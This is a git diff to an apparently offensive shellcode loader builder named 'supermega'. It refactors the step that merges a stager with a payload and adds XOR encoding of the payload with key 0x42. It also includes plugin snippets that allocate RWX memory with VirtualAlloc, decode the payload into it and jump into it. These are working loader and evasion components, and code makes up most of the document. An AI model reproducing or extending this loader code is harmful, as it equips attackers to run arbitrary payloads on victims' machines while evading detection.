diff --git a/phases/asmtoshc.py b/phases/asmtoshc.py index 0ccb815..78e5532 100644 --- a/phases/asmtoshc.py +++ b/phases/asmtoshc.py @@ -1,8 +1,11 @@ import pefile import pprint +from model import * from helper import * from config import config +from observer import observer +from project import project def make_shc_from_asm(asm_file, exe_file, shc_file): @@ -27,3 +30,27 @@ def make_shc_from_asm(asm_file, exe_file, shc_file): return code #print("---[ Shellcode from {} written to: {} (size: {}) ]".format(exe_file, shc_file, len(code))) + + +def merge_loader_payload(main_shc_file): + print("--[ Merge stager: {} + {} -> {} ] ".format( + main_shc_file, project.payload, main_shc_file)) + with open(main_shc_file, 'rb') as input1: + data_stager = input1.read() + with open(project.payload, 'rb') as input2: + data_payload = input2.read() + + if project.decoder_style == DecoderStyle.PLAIN_1: + pass + elif project.decoder_style == DecoderStyle.XOR_1: + xor_key = 0x42 + print("---[ XOR payload with key 0x{:x}".format(xor_key)) + data_payload = bytes([byte ^ xor_key for byte in data_payload]) + + print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format( + len(data_stager), len(data_payload), len(data_stager)+len(data_payload))) + + with open(main_shc_file, 'wb') as output: + data = data_stager + data_payload + output.write(data) + observer.add_code("final_shellcode", data) diff --git a/phases/ctoasm.py b/phases/ctoasm.py index 2f2ba58..fa24515 100644 --- a/phases/ctoasm.py +++ b/phases/ctoasm.py @@ -4,12 +4,13 @@ import os import pprint from observer import observer from jinja2 import Template -from project import project +from project import project from model import * use_templates = True + def create_c_from_template(): plugin_allocator = "" plugin_decoder = "" @@ -18,8 +19,12 @@ def create_c_from_template(): with open("plugins/allocator/rwx_1.c", "r", encoding='utf-8') as file: plugin_allocator = file.read() - with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file: - plugin_decoder = file.read() + if project.decoder_style == DecoderStyle.PLAIN_1: + with open("plugins/decoder/plain_1.c", "r", encoding='utf-8') as file: + plugin_decoder = file.read() + elif project.decoder_style == DecoderStyle.XOR_1: + with open("plugins/decoder/xor_1.c", "r", encoding='utf-8') as file: + plugin_decoder = file.read() with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file: plugin_executor = file.read() @@ -115,8 +120,6 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities): shutil.move(asm_clean_file, asm_file) asm["cleanup"] = file_readall_text(asm_file) - - return asm @@ -171,7 +174,7 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities): for idx, line in enumerate(lines): if "11223344" in lines[idx]: print(" > Replace payload length at line: {}".format(idx)) - lines[idx] = lines[idx].replace("11223344", str(payload_len+1)) + lines[idx] = lines[idx].replace("11223344", str(payload_len)) break # add label at end of code @@ -179,7 +182,6 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities): if lines[idx].startswith("END"): print(" > Add end of code label at line: {}".format(idx)) lines.insert(idx-1, "shcstart:\r\n") - lines.insert(idx, "\tnop\r\n") break with open(filename, 'w') as asmfile: diff --git a/plugins/allocator/rwx_1.c b/plugins/allocator/rwx_1.c index 232f86a..fb6ffa8 100644 --- a/plugins/allocator/rwx_1.c +++ b/plugins/allocator/rwx_1.c @@ -1 +1 @@ -char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40); \ No newline at end of file + char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40); \ No newline at end of file diff --git a/plugins/decoder/plain_1.c b/plugins/decoder/plain_1.c index 348f92d..d78c95d 100644 --- a/plugins/decoder/plain_1.c +++ b/plugins/decoder/plain_1.c @@ -1,3 +1,3 @@ -for(int n=0; n<11223344; n++) { - dest[n] = supermega_payload[n]; -} \ No newline at end of file + for (int n=0; n<11223344; n++) { + dest[n] = supermega_payload[n]; + } \ No newline at end of file diff --git a/plugins/decoder/xor_1.c b/plugins/decoder/xor_1.c index 03a317f..560ca6d 100644 --- a/plugins/decoder/xor_1.c +++ b/plugins/decoder/xor_1.c @@ -1,3 +1,4 @@ -for (i=0; i<11223344; i++){ - dest[i] = supermega_payload[i] ^ 0x42; -} \ No newline at end of file + for (int n=0; n<11223344; n++){ + dest[n] = supermega_payload[n]; + dest[n] = dest[n] ^ 0x42; + } \ No newline at end of file diff --git a/plugins/executor/direct_1.c b/plugins/executor/direct_1.c index e1a284c..e0d986a 100644 --- a/plugins/executor/direct_1.c +++ b/plugins/executor/direct_1.c @@ -1 +1 @@ -(*(void(*)())(dest))(); \ No newline at end of file + (*(void(*)())(dest))(); \ No newline at end of file diff --git a/supermega.py b/supermega.py index c0e3d46..e73d1a9 100644 --- a/supermega.py +++ b/supermega.py @@ -135,19 +135,7 @@ def start(): # Merge shellcode/loader with payload if project.dataref_style == DataRefStyle.APPEND: - print("--[ Merge stager: {} + {} -> {} ] ".format( - main_shc_file, project.payload, main_shc_file)) - with open(main_shc_file, 'rb') as input1: - data_stager = input1.read() - with open(project.payload, 'rb') as input2: - data_payload = input2.read() - print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format( - len(data_stager), len(data_payload), len(data_stager)+len(data_payload))) - - with open(main_shc_file, 'wb') as output: - data = data_stager + data_payload - output.write(data) - observer.add_code("final_shellcode", data) + merge_loader_payload(main_shc_file) if project.verify and project.source_style == SourceStyle.peb_walk: print("--[ Verify final shellcode ]") @@ -180,9 +168,9 @@ def start(): ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # dump the info i gathered - file = open('latest.pickle', 'wb') - pickle.dump(data, file) - file.close() + #file = open('latest.pickle', 'wb') + #pickle.dump(data, file) + #file.close() # delete files if project.cleanup_files_on_exit: